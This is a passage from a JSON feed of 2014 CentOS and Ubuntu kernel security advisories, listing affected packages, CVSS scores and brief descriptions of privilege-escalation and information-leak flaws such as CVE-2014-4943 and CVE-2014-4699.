"3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-123.4.4.el7.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-123.4.4.el7.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-123.4.4.el7.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:0923\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020446.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2014-07-25T13:22:28", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-25T13:22:28", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/020446.html", "id": "CESA-2014:0923", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:17", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0924.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:0924\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020444.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0924.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-07-25T12:19:52", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-25T12:19:52", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/020444.html", "id": "CESA-2014:0924", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-03-29T18:20:08", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-368.84", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-368-ec2", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-16T00:00:00", "type": "ubuntu", "title": "Linux kernel (EC2) vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4943", "CVE-2014-3917"], "modified": "2014-07-16T00:00:00", "href": "https://usn.ubuntu.com/2281-1/", "id": "USN-2281-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:19:24", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-powerpc64-smp", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-powerpc-smp", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-virtual", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-generic", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-generic-pae", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-omap", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-67.101", "arch": "noarch", "packageName": "linux-image-3.2.0-67-highbank", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-16T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-4943"], "modified": "2014-07-16T00:00:00", "href": "https://usn.ubuntu.com/2283-1/", "id": "USN-2283-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:18:13", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-lpia", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-preempt", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-sparc64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-sparc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-ia64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.32-64.128", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.32-64-versatile", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-16T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4943", "CVE-2014-3917"], "modified": "2014-07-16T00:00:00", "href": "https://usn.ubuntu.com/2282-1/", "id": "USN-2282-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:17:14", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4699"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-1451.71", "arch": "noarch", "packageName": "linux-image-3.2.0-1451-omap4", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nAndy Lutomirski discovered a flaw with the Linux kernel\u2019s ptrace syscall on x86_64 processors. An attacker could exploit this flaw to cause a denial of service (System Crash) or potential gain administrative privileges. (CVE-2014-4699)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-16T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-16T00:00:00", "href": "https://usn.ubuntu.com/2284-1/", "id": "USN-2284-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:21:18", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4611", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4014", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.11.0-26.45~precise1", "arch": "noarch", "packageName": "linux-image-3.11.0-26-generic-lpae", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.11.0-26.45~precise1", "arch": "noarch", "packageName": "linux-image-3.11.0-26-generic", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)\n\nA flaw was discovered in the Linux kernel\u2019s implementation of user namespaces with respect to inode permissions. A local user could exploit this flaw by creating a user namespace to gain administrative privileges. (CVE-2014-4014)\n\nDon Bailey and Ludvig Strigeus discovered an integer overflow in the Linux kernel\u2019s implementation of the LZ4 decompression algorithm, when used by code not complying with API limitations. An attacker could exploit this flaw to cause a denial of service (memory corruption) or possibly other unspecified impact. (CVE-2014-4611)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "title": "Linux kernel (Saucy HWE) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-4943", "CVE-2014-4014", "CVE-2014-3917", "CVE-2014-4611"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2287-1/", "id": "USN-2287-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:18:09", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4014", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4027", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-1739"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.5.0-54.81~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.5.0-54-generic", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)\n\nSalva Peir\u00c3\u00b3 discovered an information leak in the Linux kernel\u2019s media- device driver. A local attacker could exploit this flaw to obtain sensitive information from kernel memory. (CVE-2014-1739)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)\n\nA flaw was discovered in the Linux kernel\u2019s implementation of user namespaces with respect to inode permissions. A local user could exploit this flaw by creating a user namespace to gain administrative privileges. (CVE-2014-4014)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI target subsystem in the Linux kernel. A local user could exploit this flaw to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator. (CVE-2014-4027)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "type": "ubuntu", "title": "Linux kernel (Quantal HWE) vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-1739", "CVE-2014-4943", "CVE-2014-4014", "CVE-2014-3917", "CVE-2014-4027"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2285-1/", "id": "USN-2285-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:20:43", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4611", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4014", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4608", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "3.11.0-26.45", "arch": "noarch", "packageName": "linux-image-3.11.0-26-generic", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "3.11.0-26.45", "arch": "noarch", "packageName": "linux-image-3.11.0-26-generic-lpae", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)\n\nA flaw was discovered in the Linux kernel\u2019s implementation of user namespaces with respect to inode permissions. A local user could exploit this flaw by creating a user namespace to gain administrative privileges. (CVE-2014-4014)\n\nDon Bailey discovered a flaw in the LZO decompress algorithm used by the Linux kernel. An attacker could exploit this flaw to cause a denial of service (memory corruption or OOPS). (CVE-2014-4608)\n\nDon Bailey and Ludvig Strigeus discovered an integer overflow in the Linux kernel\u2019s implementation of the LZ4 decompression algorithm, when used by code not complying with API limitations. An attacker could exploit this flaw to cause a denial of service (memory corruption) or possibly other unspecified impact. (CVE-2014-4611)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-4943", "CVE-2014-4014", "CVE-2014-3917", "CVE-2014-4608", "CVE-2014-4611"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2289-1/", "id": "USN-2289-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:20:32", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4611", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3940", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3144", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-7284", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3145", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-1739"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": 